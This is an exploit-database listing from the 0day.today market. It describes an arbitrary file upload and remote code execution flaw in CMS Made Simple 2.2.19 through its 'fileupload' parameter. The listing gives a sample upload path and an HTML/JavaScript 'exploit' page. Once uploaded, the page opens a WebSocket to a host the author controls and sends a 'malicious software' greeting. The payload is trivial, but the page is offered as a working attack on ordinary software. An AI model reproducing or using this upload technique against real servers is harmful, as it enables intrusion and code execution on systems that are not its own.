[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMSMS 2.2.19 Arbitrary File Upload Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk High
]
0day-ID
0day-ID-39216
Category
web applications
Date add
03-01-2024
Platform
php
Description:

The parameter "fileupload" in type ID is vulnerable to File Upload and RCE attacks, it is not sanitized correctly. The attacker can upload a virus directly on the server by using this web vulnerability, and then he can execute it, this can be the end of this server depending on the scenario! In this case, I just uploaded a [WebSocket] connector - exploit.html to connect the server with my machine, this is so nasty. I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: HIGH- Vulnerability

[+]Exploit execution:

 https://pwnedhost.com/uploads/exploit.html

[+]Exploit:

<html>
	<script>
(() => {
  const ws = new WebSocket('ws://0.0.0.0:8080')
  ws.onopen = () => {
    console.log('ws opened on browser')
    ws.send('hello, you are connected with malicious software.')
  }

  ws.onmessage = (message) => {
    console.log(`message received ${message}`)
  }

})()
 </script>
</html>

#  0day.today [2024-11-16]  #